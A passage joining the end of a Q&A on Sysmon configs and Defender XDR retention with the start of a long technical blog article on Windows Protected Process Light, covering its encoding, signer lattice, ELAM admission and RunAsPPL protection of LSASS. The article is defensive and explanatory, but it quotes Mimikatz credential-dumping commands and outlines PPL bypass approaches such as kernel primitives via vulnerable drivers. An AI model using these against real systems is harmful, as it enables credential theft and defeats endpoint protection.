SwiftOnSecurity's `sysmon-config`, created on February 1, 2017 per the GitHub REST API [@github-swiftonsecurity-meta]. Florian Roth (`@Neo23x0`) forked SwiftOnSecurity's repository in January 2018 and added blocking-rule support, community pull-request merges, and the maintainer roster that now includes Tobias Michalski, Christian Burkard, and Nasreddine Bencherchali [@github-neo23x0]. The Neo23x0 repository was renamed to `NextronSystems/sysmon-config` on July 24, 2021 [@github-nextronsystems-meta]; the old URL HTTP-301 redirects to the new one and the content lineage from SwiftOnSecurity is unchanged. Calling Roth's config "the original" is the inverse of the truth; calling it "the canonical actively-maintained fork" is closer. No. Sysmon supports one active configuration at a time. There is no aggregate-multiple-XMLs feature at the driver layer. Olaf Hartong's modular workflow generates a single merged XML at build time from a per-technique module library; the production fleet receives that single XML and the driver enforces it. If you want two configurations -- one for the SOC team's hunting, one for the platform team's audit -- merge the rules at build time and ship the combined product [@github-hartong-modular]. Because it runs as Antimalware Protected Process Light (`PROTECTED_ANTIMALWARE_LIGHT`), the Windows kernel rejects ordinary user-mode `OpenProcess(PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_DUP_HANDLE)` requests against the process from any caller that does not itself run at an equal or higher signer level. The published reverse-engineering technique (FalconForce 2022) is to raise the Windows PE debug server `dbgsrv.exe` to the `WinTcb` signer level via a PPLKiller-class kernel primitive, then attach the elevated debug server to `MsSense.exe`. That technique requires a kernel-mode primitive (commonly a BYOVD chain), which is itself non-trivial. The protection level is the structural defense; the debug-server technique is the dispositive community workaround [@falconforce-2022]. Thirty days of raw data in the Defender XDR portal: "*Advanced hunting is a query-based threat hunting tool that you use to explore up to 30 days of raw data*" [@advanced-hunting-overview]. Beyond thirty days, retention is configurable per workspace via the Microsoft Sentinel Defender XDR connector; the Log Analytics workspace archive tier supports up to twelve years of per-table archive on a per-GB-billed basis [@sentinel-xdr-connector][@ms-log-analytics-archive]. The two surfaces are not exclusive; the common operational pattern is in-portal for the hunting team (30 days, no per-GB cost) plus per-table Sentinel streaming for the analytics-rules team (extended retention, per-GB cost on selected tables).

These are the questions. The seven layers between Maya's cmd.exe at 9:14 a.m. and her Kusto row at 9:14:03 are how the answers actually work -- a kernel callback, a user-mode aggregator, an ETW publisher or TLS-pinned cloud forwarder, a regional Kusto ingest, a table write, and a KQL read, with two structural defenses (Antimalware-PPL and the Sysmon v15 protected-process gate) keeping each layer honest. Every other detection-engineering pattern in the Windows field is a configuration of those seven layers, and most of the open problems are at the seams between them.

See also. The Sysmon driver's collection layer leans on the kernel-callback APIs documented in the Windows process mitigations and Object Manager namespace articles in this series. The ETW transport bus that Sysmon publishes onto -- and that EtwTi security events surface through -- is the subject of the dedicated ETW article in this series; the article goes deeper on provider GUIDs, manifests, and the eight-trace-session manifest-provider cap that bounds Sysmon's coexistence story in §10. The AMSI primary path that produces DeviceEvents ActionType = "AmsiScriptDetection" is the subject of the AMSI article; the two pipelines are siblings, not substitutes. And the Sigma rule corpus that compiles down into KQL for Defender XDR / Sentinel hunting is the same Sigma corpus that compiles into Splunk SPL and Elastic EQL -- the vendor-neutral query layer that sits above this article's KQL surface [@github-sigma].

Protected Process Light: When the Administrator Isn't Enough

noreply@paragmali.com (Parag Mali) — Tue, 12 May 2026 00:00:00 GMT

**Windows Protected Process Light (PPL) re-asks the question of who can touch whom one level below the token model.** A single byte in `EPROCESS` packs a process's protection type, audit bit, and signer rung; the kernel's lattice check inside `NtOpenProcess` rejects memory-read attempts from below the target's rung even when the caller is SYSTEM with `SeDebugPrivilege` enabled. Every public bypass since 2018 lives in one structural class -- the kernel verifies the channel by which code enters a PPL, not the behaviour of that code once mapped -- which is why Microsoft classifies PPL as defense in depth rather than a security boundary, and why Credential Guard / `LsaIso.exe` is its necessary VBS-anchored companion.

1. Mimikatz on a Protected Box

A red team operator has done everything right. The shell is SYSTEM-integrity. SeDebugPrivilege is enabled in the token. whoami /priv shows every privilege Windows defines. The operator types mimikatz.exe, then privilege::debug -- OK. Then sekurlsa::logonpasswords -- and Mimikatz answers:

ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory : (0x00000005) Access is denied

The mechanism that just denied them is not a privilege check at all. It is not an ACL decision. It is not the integrity-level mediator. itm4n recreated exactly this failure in 2021 against a vanilla Windows install with one registry value set [@itm4n-runasppl]. The error code 0x00000005 is ERROR_ACCESS_DENIED -- the Win32 surface that GetLastError exposes for the kernel's NTSTATUS STATUS_ACCESS_DENIED = 0xC0000022. The kernel returns the NTSTATUS out of NtOpenProcess before the security descriptor of lsass.exe has been consulted; RtlNtStatusToDosError then maps it to the Win32 0x5 that surfaces in kuhl_m_sekurlsa.c.

A kernel-enforced gating model that decorates a process with a *protection level* -- a structured byte combining a type field, an audit bit, and a signer rung -- and rejects `OpenProcess` requests from callers whose protection level is below the target's, regardless of token privileges or security-descriptor ACLs.

Picture the scenario concretely. A 2026 red-team engagement against a hardened Windows 11 24H2 endpoint. RunAsPPL audit-mode is on by default after the Windows 11 22H2 rollout extended audit-default to consumer SKUs [@learn-runasppl]. A third-party EDR daemon is already running, signed at the Antimalware rung via the vendor's Microsoft Virus Initiative enrollment. The operator owns local administrator. The operator has SYSTEM. The operator holds every privilege Windows defines. They still cannot read a single byte of LSASS memory.

The denial trace, walked carefully, looks like this. Mimikatz calls OpenProcess(PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, FALSE, lsass_pid). The Win32 thunk lands on NtOpenProcess, which dispatches to the object-manager callback PspProcessOpen. That callback calls PspCheckForInvalidAccessByProtection, which calls RtlTestProtectedAccess against the caller's EPROCESS.Protection byte and the target's EPROCESS.Protection byte. The lattice test fails. The kernel strips PROCESS_VM_READ from the requested mask. With the surviving limited mask, the request continues into SeAccessCheck, but Mimikatz never wanted the limited mask; it wanted to read memory. The handle returned (or the failure path taken) gives Mimikatz exactly the path that produces 0x00000005 in kuhl_m_sekurlsa.cThe relevant commit is fe4e98405589e96ed6de5e05ce3c872f8108c0a0, cited by itm4n as the source for the exact failure path that yields 0x00000005 [@mimikatz-sekurlsa]..

sequenceDiagram participant Mim as Mimikatz (SYSTEM, SeDebugPrivilege) participant K32 as kernel32 / OpenProcess participant NtOP as NtOpenProcess participant PsPO as PspProcessOpen participant CHK as PspCheckForInvalidAccessByProtection participant Lat as RtlTestProtectedAccess participant SAC as SeAccessCheck

Mim->>K32: OpenProcess(PROCESS_VM_READ, lsass)
K32->>NtOP: syscall NtOpenProcess
NtOP->>PsPO: object-manager callback
PsPO->>CHK: check caller.Protection vs target.Protection
CHK->>Lat: lattice rule (signer rungs)
Lat-->>CHK: full mask denied
CHK-->>PsPO: strip PROCESS_VM_READ
PsPO->>SAC: residual mask (limited only)
SAC-->>NtOP: limited handle (read denied)
NtOP-->>Mim: STATUS_ACCESS_DENIED (NTSTATUS 0xC0000022, Win32 GetLastError = 5)

Note: If every privilege Windows defines is held by the caller, what is doing the denying? The answer is a kernel structure that the token model does not see and the security descriptor does not influence -- a byte in EPROCESS named Protection, mediating a lattice the access check consults before it ever asks SeAccessCheck about privileges.

This is not a workaround pattern. It is a new dimension. The token model is unchanged. The integrity level is unchanged. The security descriptor on lsass.exe is unchanged. What changed is that the kernel now answers a question it did not ask before: what kind of trust does the caller have to manipulate the address space of the callee?

PPL re-asks the question of who can touch whom one level below the token model.

That mechanism has a name (Protected Process Light), an encoding (a single UCHAR), and a history that does not begin where you would expect. To understand the byte, we have to understand why Microsoft built it in the first place. The next section starts where the history starts: a 2006 Microsoft whitepaper about Hollywood.

2. Historical Origins -- Vista, DRM, and the First Protected Process

The kernel mechanism that today denies admins access to LSASS was invented in 2006 to keep Hollywood happy. The cover page of Microsoft's process_vista.doc whitepaper opens with a sentence almost no one quotes today:

The Microsoft Windows Vista operating system introduces a new type of process known as a protected process to enhance support for Digital Rights Management functionality in Windows Vista.

The whitepaper was published November 27, 2006, two months before Vista's GA, and it is the architectural seed of the byte we will be staring at for the rest of this article [@vista-process-doc]. The motivation was not credential theft. It was HD-DVD and Blu-ray content protection. Studio licensing agreements required that even an administrator on the local machine could not read the audio device graph isolation host's memory while protected content was playing. The Protected Media Path required a kernel-enforced barrier between admin user-mode and the media pipeline.

The Vista-era set of components that decrypt and render high-definition video and audio content under DRM. PMP requires kernel-enforced isolation of `audiodg.exe` and a small set of related processes so that local administrators cannot dump intermediate content keys from process memory.

The Vista design was minimal. A single bit in EPROCESS marks a process as protected. At NtCreateUserProcess, the kernel parses the main image's Authenticode signature and looks for a specific Microsoft EKU OID that only the PMP signing root can issue [@forshaw-2018-10]. If the EKU is present and the chain resolves to that root, the kernel flips the bit. On every subsequent NtOpenProcess against that process, the kernel strips a fixed set of access rights from the mask, no matter who is asking.

Alex Ionescu, then a Windows internals researcher and now CrowdStrike's Chief Technology Innovation Officer, enumerated the denials in 2007 [@ionescu-pp-bad-idea]:

A typical process cannot perform operations such as the following on a protected process: Inject a thread into a protected process; Access the virtual memory of a protected process; Debug an active protected process; Duplicate a handle from a protected process; Change the quota or working set of a protected process.

Five denials. One bit. One certificate root. Ionescu's same essay, titled "Why Protected Processes Are A Bad Idea," made a structural argument that aged well: putting a DRM mechanism in the kernel is a category error. The mechanism is too narrow for non-DRM use because the only certificate accepted is Microsoft's PMP signing root, and the only operations gated are the ones Hollywood cared about. Third parties cannot opt in, and Microsoft itself cannot graduate the level of trust.Ionescu's 2007 critique remains worth reading on its own merits. The argument that DRM-shaped kernel features tend to be reused for security mitigations and that this reuse changes their threat-model semantics is exactly what plays out over the next seven years [@ionescu-pp-bad-idea].

The seven-year pause is its own story. Vista shipped, Vista was followed by Windows 7, and Windows 7 was followed by Windows 8 -- and through all of it, the access-check primitive that protects audiodg.exe from administrators remained a DRM artefact. The primitive existed; the graduated trust dimension did not. Two parallel failures pushed Microsoft toward widening the encoding.

The first was Mimikatz. Benjamin Delpy's tool was first released in May 2011 and refined through 2013 [@mimikatz-wikipedia]; it made it trivial for an administrator to extract NTLM hashes and Kerberos session keys from lsass.exe. The countermeasure of restricting SeDebugPrivilege was useless; an attacker who has SYSTEM has every privilege. What Mimikatz exploited was a primitive gap: the kernel had no way to say "lsass is protected against administrators but reachable from privileged Microsoft services."

The second was Mateusz Jurczyk's CSRSS jailbreak of Windows 8 RT in 2013. Jurczyk (who writes as j00ru) catalogued more than seventy Win32k system calls that the kernel guarded with the pattern if (PsGetCurrentProcess() != gpepCsrss) return STATUS_ACCESS_DENIED; [@j00ru-1393]. That gating mechanism worked only as long as nobody could inject code into csrss.exe. On Windows 8 RT, an attacker who could inject into csrss.exe could bypass Microsoft's locked-down Surface RT shell. Ionescu later observed that "In Windows 8.1 RT, this jailbreak is 'fixed', by virtue that code can no longer be injected into Csrss.exe for the attack" [@ionescu-part2]. The fix made csrss.exe a PPL at the WinTcb rung, and the same machinery was generalised to lsass.exe and the Antimalware tier.

Note: Mimikatz proved Microsoft needed a graduated trust dimension for lsass.exe. The j00ru CSRSS jailbreak proved Microsoft needed it for csrss.exe too. The same widening of the encoding answered both.

flowchart LR subgraph Vista2006[Vista 2006 -- single bit] V1[EPROCESS protected = 0 or 1] V2[Certificate root: PMP only] V3[Access denials: hardcoded 5-tuple] end subgraph Win81[Windows 8.1 -- _PS_PROTECTION byte] W1[Type: 3 bits] W2[Audit: 1 bit] W3[Signer rung: 4 bits] W4[Certificate roots: per-EKU sub-OIDs] W5[Access denials: lattice over signer] end V1 --> W1 V2 --> W4 V3 --> W5 The DRM-to-credentials repurposing is not unique to PPL. The same pattern shows up in HVCI (originally a Hyper-V kernel-mode integrity feature, later repurposed for general code-integrity enforcement) and in Trustlets (originally an enterprise feature for Credential Guard, later generalised). Kernel mechanisms born in one threat model rarely stay confined to it.

Microsoft already had the access-check primitive. What it didn't have, in 2007, was a way to ask "how much trust does this process carry?" The fix would not arrive until Windows 8.1 in October 2013, and when it arrived, it would fit in a single byte.

3. `_PS_PROTECTION` -- The Single-Byte Encoding

The 8.1 fix is so compact it fits in a single byte. Ionescu's Part 1 of the "Evolution of Protected Processes" series, published November 22, 2013, gives the kernel structure verbatim [@ionescu-part1]:

typedef struct _PS_PROTECTION {
    union {
        UCHAR Level;
        struct {
            UCHAR Type   : 3;
            UCHAR Audit  : 1;
            UCHAR Signer : 4;
        };
    };
} PS_PROTECTION, *PPS_PROTECTION;

Three fields. One byte. The union with Level:UCHAR exists so that two _PS_PROTECTION values can be compared with a single byte load and a single byte compare. The kernel does this on every NtOpenProcess. Speed matters; this is the hot path of the security model.

The kernel structure that encodes a process's protection state in eight bits: three bits of Type (`None`, `ProtectedLight`, `Protected`), one bit of Audit (intended as a forensic side-channel hint, although the exact runtime semantics are not enumerated in the public sources cited here), and four bits of Signer rung. Stored as `EPROCESS.Protection`.

The Type field has three values. PsProtectedTypeNone = 0 marks a regular process. PsProtectedTypeProtectedLight = 1 marks a PPL -- the graduated path introduced in 8.1. PsProtectedTypeProtected = 2 marks a "heavy" Vista-style PP. Heavy PPs still exist; they retain the original DRM semantics where almost nothing from below the protection level may touch them. PPLs are the new general-purpose path where the signer rung mediates a graduated lattice.

The Audit bit is the least documented of the three fields. Ionescu Part 1 lists it as Audit : Pos 3, 1 Bit with no semantic gloss; itm4n's RunAsPPL header annotates it as // Reserved; Microsoft Learn enumerates CodeIntegrity events 3033, 3063, 3065, and 3066, but those are triggered by the AuditLevel configuration under Image File Execution Options\LSASS.exe and concern DLL-load failures, not per-process OpenProcess denials [@ionescu-part1] [@itm4n-runasppl] [@learn-runasppl]. The field's name implies a forensic side-channel, and the bit-position is reserved; the precise runtime emission shape is not enumerated in the public sources cited here.

The Signer field is the structurally interesting one. Ionescu's 2013 enumeration names eight values [@ionescu-part1]:

Signer constant	Value	Used for
`PsProtectedSignerNone`	0	Non-protected (no rung)
`PsProtectedSignerAuthenticode`	1	Generic third-party Authenticode (early PPL guests)
`PsProtectedSignerCodeGen`	2	.NET native runtime code generators
`PsProtectedSignerAntimalware`	3	EDR / AV daemons admitted via ELAM
`PsProtectedSignerLsa`	4	`lsass.exe` under `RunAsPPL`
`PsProtectedSignerWindows`	5	Microsoft Windows components below TCB
`PsProtectedSignerWinTcb`	6	`csrss.exe`, `smss.exe`, `services.exe` -- the inbox TCB
`PsProtectedSignerMax`	7	Sentinel value (enumeration upper bound)

Note: Ionescu's 2013 list is the authoritative baseline enumeration. It is not a permanent enumeration. By 2018, James Forshaw's PowerShell tooling (NtApiDotNet) was enumerating an additional App = 8 signer used for AppContainer / TruePlay scenarios [@forshaw-2018-10]. Newer builds of Windows extend the enumeration further. The article will name WinTcb (Microsoft's documented inbox-TCB rung) and Antimalware (the only non-Microsoft-admissible rung) repeatedly, because they are the load-bearing ones. The intermediate values evolve.

Adjacent to EPROCESS.Protection are two related fields, EPROCESS.SignatureLevel and EPROCESS.SectionSignatureLevel, which Ionescu introduces in Part 3 [@ionescu-part3]. These fields encode the binary integrity the kernel demands at process creation and at every subsequent section load, and they are filled in from a 16-entry Signing Level table that runs from Unchecked = 0 up to Windows TCB = 14. The Signer rung in Protection answers "what kind of trust does this process hold?" The SignatureLevel pair answers "what binaries is this process allowed to map?" They are not the same question.

Now the worked decode. Given the byte value 0x41, the encoding falls out by hand:

Low three bits (Type): 0x41 & 0x07 = 0x01 -- PsProtectedTypeProtectedLight.
Bit 3 (Audit): (0x41 >> 3) & 0x01 = 0 -- Audit off.
High four bits (Signer): (0x41 >> 4) & 0x0F = 0x04 -- PsProtectedSignerLsa.

A process with EPROCESS.Protection = 0x41 is a PPL signed at the Lsa rung. That is exactly what lsass.exe looks like on a host with RunAsPPL = 1. Ionescu's blog explicitly states: "it's easy to read 0x41 as Lsa (0x4) + PPL (0x1)" [@ionescu-part1]. The Defender service MsMpEng.exe, signed at the Antimalware rung, has Protection = 0x31. The session manager csrss.exe, signed at WinTcb, has Protection = 0x61.

flowchart TD B[byte: 8 bits] B --> F1[bits 0..2: Type] B --> F2[bit 3: Audit] B --> F3[bits 4..7: Signer] F1 --> T0[0 = None] F1 --> T1[1 = ProtectedLight PPL] F1 --> T2[2 = Protected PP] F3 --> S0[0 None] F3 --> S1[1 Authenticode] F3 --> S2[2 CodeGen] F3 --> S3[3 Antimalware] F3 --> S4[4 Lsa] F3 --> S5[5 Windows] F3 --> S6[6 WinTcb]

{` function decodeProtection(byteValue) { const type = byteValue & 0x07; const audit = (byteValue >> 3) & 0x01; const signer = (byteValue >> 4) & 0x0F; const typeNames = ['None', 'ProtectedLight', 'Protected']; const signerNames = [ 'None', 'Authenticode', 'CodeGen', 'Antimalware', 'Lsa', 'Windows', 'WinTcb', 'Max' ]; return { raw: '0x' + byteValue.toString(16).padStart(2, '0'), type: typeNames[type] || 'unknown(' + type + ')', audit: audit ? 'on' : 'off', signer: signerNames[signer] || 'unknown(' + signer + ')' }; }

// Worked examples from real Windows processes console.log('MsMpEng.exe (Defender):', decodeProtection(0x31)); console.log('lsass.exe under RunAsPPL:', decodeProtection(0x41)); console.log('csrss.exe (WinTcb):', decodeProtection(0x61)); `}

Note: One byte, three fields, eight signer rungs. The kernel reads it on every OpenProcess, before any token check, before any ACL evaluation. The encoding is the entire vocabulary the kernel has for asking how trusted a process is.

The encoding tells the kernel what kind of trust a process holds. It says nothing about who can touch whom across rungs. That rule -- the lattice -- is the structure imposed on top of the bytes. The next section is the lattice.

4. The Signer Lattice -- Who Can Open Whom

itm4n's 2021 walkthrough states the three rules verbatim, and they have the rare quality of being short enough to memorise [@itm4n-scrt]:

A PP can open a PP or a PPL with full access if its signer type is greater or equal. A PPL can open a PPL with full access if its signer type is greater or equal. A PPL cannot open a PP with full access, regardless of its signer type.

Three rules. They settle every cross-process access question PPL gates. Let us name them and then read off their consequences.

Rule 1. A PP at signer $S_c$ may open with full access a PP or PPL at signer $S_t$ if and only if $S_c \ge S_t$.

Rule 2. A PPL at signer $S_c$ may open with full access a PPL at signer $S_t$ if and only if $S_c \ge S_t$.

Rule 3. A PPL cannot open a PP with full access, regardless of signer.

The qualifier "with full access" is load-bearing. PPL's lattice gates the full mask -- PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_CREATE_THREAD, PROCESS_DUP_HANDLE, PROCESS_ALL_ACCESS. A separate limited mask (SYNCHRONIZE, PROCESS_QUERY_LIMITED_INFORMATION, PROCESS_SET_LIMITED_INFORMATION, PROCESS_SUSPEND_RESUME, and -- for callers below the Authenticode/CodeGen/Windows tier -- PROCESS_TERMINATE) is allowed when the security descriptor permits. The tier matters. Ionescu's verbatim RtlProtectedAccess[] table widens the deny mask from 0xFC7FE to 0xFC7FF at the Antimalware, Lsa, and WinTcb rungs -- one extra bit, bit 0, which is PROCESS_TERMINATE [@ionescu-part2]. So an administrator can still call OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, ...) against a protected lsass.exe to enumerate threads, but cannot terminate a PPL/Antimalware, PPL/Lsa, or PPL/WinTcb daemon via a direct kill. The lattice does not lock the process; it locks the interesting access, and for the top-tier rungs it also locks the kill.

Caller signer \ Target signer	None	Authenticode (1)	Antimalware (3)	Lsa (4)	Windows (5)	WinTcb (6)
None (admin, integrity SYSTEM)	full	denied	denied	denied	denied	denied
PPL/Authenticode (1)	full	full	denied	denied	denied	denied
PPL/Antimalware (3)	full	full	full	denied	denied	denied
PPL/Lsa (4)	full	full	full	full	denied	denied
PPL/Windows (5)	full	full	full	full	full	denied
PPL/WinTcb (6)	full	full	full	full	full	full

Where "denied" means the full mask is rejected; the limited mask continues to apply per the target's security descriptor.

flowchart BT None[None / unprotected] Auth[Authenticode] CG[CodeGen] AM[Antimalware] Lsa[Lsa] Win[Windows] Tcb[WinTcb] None --> Auth Auth --> CG CG --> AM AM --> Lsa Lsa --> Win Win --> Tcb

The Enhanced Key Usage side of the design holds the lattice together. Microsoft's EKU OID arc 1.3.6.1.4.1.311.10.3.* defines sub-OIDs per signer rung [@iana-pen311] [@oid-base-eku-arc], and at process creation the kernel parses the main image's Authenticode signature and walks its EKU extensions to determine which rung the binary is entitled to claim. If the certificate chain resolves cleanly to a Microsoft-issued root and carries the rung's sub-OID, the kernel records the rung. Otherwise the process either starts unprotected or refuses to start at all.

An X.509 v3 certificate extension that asserts what specific purposes a certificate is allowed to certify. Microsoft uses sub-OIDs under `1.3.6.1.4.1.311.10.3.*` to encode protected-process signer rungs as EKU values [@iana-pen311] [@oid-base-eku-arc]. The kernel checks the EKU at process creation; the certificate chain anchors which Microsoft-issued sub-CA may issue at each rung.The IANA Private Enterprise Number `311` is registered to Microsoft under the PEN prefix `1.3.6.1.4.1.` [@iana-pen311], so `1.3.6.1.4.1.311.*` is the catch-all namespace for Microsoft-specific X.509 extensions; the `10.3.*` arc within it is the Microsoft Enhanced Key Usage (purpose) sub-tree [@oid-base-eku-arc], and `10.3.` slots map to specific signer purposes including protected-process rungs.

The most important property of this design is the resolution point. The kernel parses the EKU exactly once, at NtCreateUserProcess. It stores the resulting rung in EPROCESS.Protection. On every subsequent OpenProcess against that process, the kernel consults the byte, not the certificate. This makes the access check fast (one byte load, one byte compare) and decouples policy at runtime from policy at signing time. It also creates the structural seam that every public bypass since 2018 has exploited, because the kernel's confidence in the byte is exactly the confidence it had in the certificate at process-create time, projected forward indefinitely.

Ionescu's Part 2 names the implementation directly. The lattice is not code; it is a data table named RtlProtectedAccess[] baked into ntoskrnl.exe [@ionescu-part2]. Each row of that table corresponds to a (signer, target-type) pair and encodes which access bits are allowed in the full mask. The relevant runtime routines are PspProcessOpen and PspThreadOpen (the object-manager open callbacks), PspCheckForInvalidAccessByProtection (which performs the check), RtlTestProtectedAccess (which applies the lattice row), and RtlValidProtectionLevel (which sanity-checks the encoded byte for consistency).

Note: The decision of who can touch whom is encoded in a table inside ntoskrnl.exe. Changing the lattice means changing a table; widening or narrowing it does not require new code. This is why Microsoft can add App = 8 to the enumeration over time without touching the access-check routine.

Note one symmetry that becomes important later. "Greater or equal" means that within a rung, every PPL can read every other PPL. Two co-resident PPL/Antimalware daemons -- Microsoft Defender's MsMpEng.exe and a third-party EDR's agent -- can call PROCESS_VM_READ on each other. Within-rung peers leak to each other by design. The lattice prevents escalation, not peer access.

The lattice settles the rule. The next question is admission: who decides which binaries are allowed to claim the Antimalware rung, and how does Microsoft admit third-party code into it at all? The answer is a driver.

5. The Antimalware Rung -- ELAM and Third-Party Code at PPL

PPL is interesting only if it admits non-Microsoft code at some rung. The Vista PP design admitted nobody; it required a Microsoft PMP root certificate, full stop. PPL inherited that constraint at every rung except one. The Antimalware rung -- signer value 3 -- is the only rung where third-party vendors can ship their own user-mode binaries as protected processes. The admission mechanism is the Early Launch Anti-Malware driver.

A specially signed Microsoft-certified kernel driver shipped by an anti-malware vendor that loads before any other boot-start driver. The ELAM driver participates in trusted-boot measurement, vouches for follow-on drivers, and -- critical to PPL -- carries an embedded resource section enumerating the vendor's user-mode signing certificate hashes. The kernel uses that resource section to admit the vendor's user-mode daemon binaries to `PPL/Antimalware` at service start.

Microsoft Learn's "Protecting Anti-Malware Services" page describes the boot-time admission flow in two sentences [@learn-am-services]:

The driver must have an embedded resource section containing the information of the certificates used to sign the user mode service binaries. During the boot process, this resource section will be extracted from the ELAM driver to validate the certificate information and register the anti-malware service.

Two consequences. First, the third-party signer set is bounded by a kernel-readable resource section, not by an open EKU. Microsoft, not the vendor, controls which user-mode binaries are admissible. Second, the certificate hashes are baked into the driver at signing time and re-validated at every service start. A vendor cannot widen the admissible set after the fact; an attacker cannot drop in their own user-mode binary unless its hash is already listed.

The gate that decides which vendors get ELAM drivers in the first place is the Microsoft Virus Initiative. Microsoft Learn's MVI criteria page enumerates the requirement explicitly [@learn-mvi]:

Your security solution must be certified within the last 12 months by at least one of the organizations listed below: AV-Comparatives, AVLab Cybersecurity Foundation, AV-Test, MRG Effitas, SE Labs, SKD Labs, VB 100, West Coast Labs.

The same page requires "use of Trusted Signing," Microsoft's cloud-managed code signing service. The implications are operational. To ship code at PPL/Antimalware, a vendor must (a) hold MVI membership, (b) maintain independent-lab certification, (c) author an ELAM driver, (d) get the driver through Microsoft WHQL and have it Microsoft co-signed, and (e) embed the user-mode certificate hashes in the driver's resource section.

A Microsoft program for anti-malware vendors that gates access to ELAM driver signing and to specific Defender APIs. Membership requires independent-lab certification (renewed annually) and Trusted Signing usage; in practical terms, MVI membership is the entry ticket to deploying user-mode binaries at `PPL/Antimalware`. The implication of MVI is that an indie security tool, however technically sound, cannot deploy as `PPL/Antimalware`. The gate is not technical but commercial: independent-lab certification fees, annual renewals, and the engineering investment of building a production-grade ELAM driver. The signer rung is *signed*; the signing program is *gated*. sequenceDiagram participant BM as Boot manager participant K as Windows kernel participant ELAM as Vendor ELAM driver (.sys) participant SCM as Service Control Manager participant CI as ci.dll (CodeIntegrity) participant Svc as Vendor service (e.g. EDR daemon) BM->>K: load boot drivers K->>ELAM: load ELAM driver early K->>ELAM: read embedded ELAM resource section K->>K: cache vendor user-mode cert hashes Note over K,SCM: Boot continues, OS initialises SCM->>Svc: start vendor service Svc->>CI: validate service binary signature CI->>K: lookup vendor cert against cached hashes K-->>CI: match -- admit at PPL/Antimalware CI-->>Svc: launch as PPL/Antimalware (Protection = 0x31)

By 2024, every major commercial EDR ships through this path. Microsoft Defender's MsMpEng.exe uses the inbox WdBoot.sys ELAM driverWdBoot.sys ("Windows Defender Boot Driver") is Microsoft's inbox first-party ELAM driver; it ships in every Windows install and is loaded before any third-party ELAM driver. The canonical reference implementation of the ELAM resource-section pattern is Microsoft's Windows-driver-samples/security/elam repository [@ms-elam-sample], which also documents the Early Launch EKU 1.3.6.1.4.1.311.61.4.1 verbatim.. Third-party members of Microsoft's Virus Initiative -- the cohort gated by the MVI criteria quoted above [@learn-mvi] -- ship their own vendor ELAM drivers and run their main user-mode daemons at PPL/Antimalware. Microsoft Learn's "Early Launch Antimalware" page is the canonical confirmation [@learn-elam]:

Because an ELAM service runs as a PPL (Protected Process Light), you need to debug using a kernel debugger.

One Microsoft-signed sentence and a billion endpoints. EDR vendors get protection against administrator-level tampering for free, on top of the kernel telemetry their drivers already collect. Microsoft gets a viable third-party security market without widening the EKU gates beyond a controllable set of vendors.

ELAM admits the daemon. The next operational question is what Microsoft does for lsass.exe itself -- the canonical credential store, the original Mimikatz target. The mechanism is called RunAsPPL.

6. RunAsPPL -- Hardening LSASS

The registry value that produced the Mimikatz failure in Section 1 is a single DWORD. itm4n's walkthrough names it verbatim [@itm4n-runasppl]:

Open the key HKLM\SYSTEM\CurrentControlSet\Control\Lsa; add the DWORD value RunAsPPL and set it to 1; reboot.

After reboot, lsass.exe launches at PPL/Lsa, signer rung 4, protection byte 0x41. Mimikatz running with full SYSTEM-integrity and SeDebugPrivilege then receives 0x00000005 on OpenProcess(PROCESS_VM_READ, lsass.exe). The registry knob is one DWORD; the consequences are large.

The Windows user-mode process that holds NTLM password hashes, Kerberos Ticket Granting Tickets, MSV1_0 credential caches, DPAPI master keys, and (on legacy builds before Microsoft's 2014 KB2871997 update [@ms-kb2871997]) WDigest plaintext passwords. The canonical target of credential-theft tooling since 2011.

The threat being mitigated is simple. Mimikatz reads LSASS memory via OpenProcess(PROCESS_VM_READ, lsass.exe), walks the internal key-store structures, and extracts NTLM hashes, Kerberos session keys, and (on older configurations) cached plaintext. Restricting SeDebugPrivilege does not work, because an attacker with SYSTEM has every privilege. Restricting the security descriptor on lsass.exe does not work either, because legitimate services need to interact with it. PPL is the right primitive: it gates the full mask irrespective of token state, and the kernel admits only Microsoft-signed code into the Lsa rung.

RunAsPPL = 1 is the stronger form of the setting on Secure Boot-capable machines. On the next boot, the kernel automatically mirrors the policy into a Secure Boot-anchored UEFI variable; once set, the protection survives registry rollback. An attacker who removes the registry key finds that LSASS still launches as PPL on the next boot. The only path to remove the protection is to disable Secure Boot at the firmware level, which requires physical access and which trips other defences. Microsoft Learn's documentation describes it verbatim [@learn-runasppl]:

You can achieve further protection when you use Unified Extensible Firmware Interface (UEFI) lock and Secure Boot. When these settings are enabled, disabling the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa registry key has no effect.

This is RunAsPPL = 1. For environments that need admin-removable protection without the UEFI lock, RunAsPPL = 2 (available on Win11 22H2 and later) omits the UEFI variable. The policy lives in the registry only and is removable by any administrator (or by malware running as administrator) who simply deletes the registry value before reboot.

`RunAsPPL` value	Behaviour	Removable by?	Persistence
`0` (or absent)	LSASS runs unprotected	n/a	none
`1`	LSASS runs as PPL/Lsa; policy mirrored to UEFI variable on Secure Boot machines	Physical access + Secure Boot disable	Firmware-anchored
`2`	LSASS runs as PPL/Lsa; registry only (Win11 22H2+ only)	Any admin who deletes the key	Registry only

Note: The RunAsPPL = 1 setting is the practical answer to "what stops an attacker who is willing to reboot?" Once the UEFI variable is set, neither registry rollback nor PE-based offline attacks on the registry hive can disable LSA protection on the next boot.

The deployment cost of RunAsPPL is compatibility with third-party authentication modules. LSASS hosts a set of plug-ins: smart-card middleware, third-party Cryptographic Service Providers (CSPs), password-filter DLLs, alternative authentication packages. Under RunAsPPL, the kernel demands that every DLL loaded into LSASS be Microsoft-signed at the LSA level (signer rung 4). Vendor DLLs that lack the right EKU are rejected at section creation. The rejections surface as CodeIntegrity events in the system event log. Microsoft Learn enumerates the two relevant event IDs [@learn-runasppl]:

Event 3065 occurs when a code integrity check determines that a process, usually LSASS.exe, attempts to load a driver that doesn't meet the security requirements for shared sections.

Event 3066 occurs when a code integrity check determines that a process, usually LSASS.exe, attempts to load a driver that doesn't meet the Microsoft signing level requirements.

This is why Microsoft recommends running the setting in audit mode before enforcement. Audit mode is enabled by setting a separate AuditLevel DWORD to 8, but -- critically -- under a different registry key from the one that hosts RunAsPPL. Microsoft Learn places AuditLevel under the Image File Execution Options hive for LSASS.exe and names the path verbatim [@learn-runasppl]:

